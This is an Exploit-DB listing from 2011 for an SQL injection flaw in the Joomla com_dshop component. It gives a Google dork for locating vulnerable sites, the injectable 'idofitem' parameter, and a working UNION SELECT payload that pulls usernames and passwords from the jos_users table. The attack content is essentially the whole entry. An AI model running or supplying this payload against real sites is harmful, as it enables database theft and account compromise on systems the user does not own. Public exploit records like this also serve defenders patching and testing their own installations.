Joomla Component com_dshop SQL Injection Vulnerability

2011-12-19T00:00:00
ID EDB-ID:18251
Type exploitdb
Reporter CoBRa_21
Modified 2011-12-19T00:00:00

Description

Joomla Component (com_dshop) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ################################################################################################
#  Exploit Title: Joomla Component (com_dshop) SQL Injection Vulnerability
#
#  Author : CoBRa_21 
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : inurl:com_dshop
#
#  Status : High-Risk
#
#  Script Page : null
#
#  Reference : http://www.securityfocus.com/bid/47971/info
################################################################################################
#
#  SQL Vulnerability
#
#  http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
#
#  SQL Exploit
#
#  +union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users
#
################################################################################################
#                                                                                                   ( Vulnerability Researcher ) 
################################################################################################